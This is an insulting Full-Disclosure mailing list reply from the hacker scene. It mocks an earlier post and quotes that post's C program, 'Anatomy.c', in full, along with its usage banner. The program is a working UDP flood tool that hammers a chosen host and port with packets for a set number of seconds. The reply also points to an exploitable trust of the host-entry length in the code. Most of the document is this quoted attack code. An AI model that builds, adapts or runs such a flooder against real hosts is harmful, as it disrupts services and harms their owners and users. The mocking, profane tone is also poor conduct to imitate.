411 [ sneak previews ] - #1

[full-disclosure () lists netsys com (full-disclosure () lists netsys com)]

Ok jerkface, before you call ~el8 and phrack lame, why don't
you learn how to evolve beyond remedial sockets programming?

I won't be a pedant and point out the lack of error checking
and other minor points... but HEY BR0 WH4T'Z THIS:

>   bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);

Trusting h_length? [LOL] WTF R U TH1NK1NG BR0? [LOL] And how 
come the security expert Isaak Bloodlore didn't comment on 
this exploitable condition in the client?! 

> /* From the big generousity of el8 and phrack @ efnet. */
>                /* l4m3rz!! h4h4!!! */

h4h4h4h4h ell-oh-ell'ing @ u loolololooxzllioollzoolZ



> /*
> * Anatomy.c
> * I have no idea how this could be a threat
> * if it would be kept private.
> *
> * Published by: slackwh0re 
> <slackwh0re@fuck-el8-and-fuck-phrack_at_efnet.com>
> * Author: unknown <unknown () unknown unk>
> *
> * k1dd13 us4g3: ./anatomy
> * 3ls3: `vi anatomy.c`
> *
> *      --slackwh0re
> *
> * Full-Disclosure, Fresh and shiny.
> * Full-Disclosure, Unreal hacking.
> * Full-Disclosure, Cos that's the real elite shit.
> * Full-Disclosure, Ken Levine does it.
> * Full-Disclosure, - since 1901.
> * Full-Disclosure, ~/Full-Disclosure directory.
> * Full-Disclosure, Erected because of it.
> * Full-Disclosure, Lame el8 blames
> * Full-Disclosure,l8er.
> *
> * He said: "Don't wonder why there is no comments."
> */
>
> #define BOMB_STRING "0123456789ABCDE"
> #define BOMB_SIZE 15
>
> #include <stdio.h>
> #include <sys/param.h>
> #include <sys/socket.h>
> #include <sys/time.h>
> #include <time.h>
> #include <netinet/in.h>
> #include <netdb.h>
> #include <stdarg.h>
>
> int echo_connect(char *, short);
>
> int echo_connect(char *server, short port)
> {
>   struct sockaddr_in sin;
>   struct hostent *hp;
>   int thesock;
>
>   printf("\n");
>   printf("Stealth> %s : port %d\n", server, port);
>   hp = gethostbyname(server);
>   if (hp==NULL) {
> printf("Stealth> Non-existant host: %s\n",server);
> printf("\n");
> exit(0);
>   }
>   bzero((char*) &sin, sizeof(sin));
>   bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
>   sin.sin_family = hp->h_addrtype;
>   sin.sin_port = htons(port);
>   thesock = socket(AF_INET, SOCK_DGRAM, 0);
>   connect(thesock,(struct sockaddr *) &sin, sizeof(sin));
>   return thesock;
> }
> main(int argc, char **argv)
> {
>   time_t start=time(NULL);
>   int s;
>   int secs;
>   if(argc != 4)
>   {
>
> printf("\n");
> printf("Anatomy Stealth By T10o Modified By The DvS. U dun Phee
> R?!\n");
> printf("\n");
> printf("Usage: st-kill <the lamer host> <fucking port> <secs>\n
> ");
> printf("\n");
> exit(0);
>   }
>   s=echo_connect(argv[1], atoi(argv[2]));
>   secs= atoi(argv[3]);
>   for(;;)
>   {
> while(time(NULL) <= start+secs)
> {send(s, BOMB_STRING, BOMB_SIZE, 0);}
> exit(0);
>   }
> }
>
> /* From the big generousity of el8 and phrack @ efnet. */
>                /* l4m3rz!! h4h4!!! */
>
>
>
>
>
> _______________________________________________________________
> __
> Chat with friends online, try MSN Messenger: http://messenger.m
> sn.com
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html




Get your free encrypted email at https://www.hushmail.com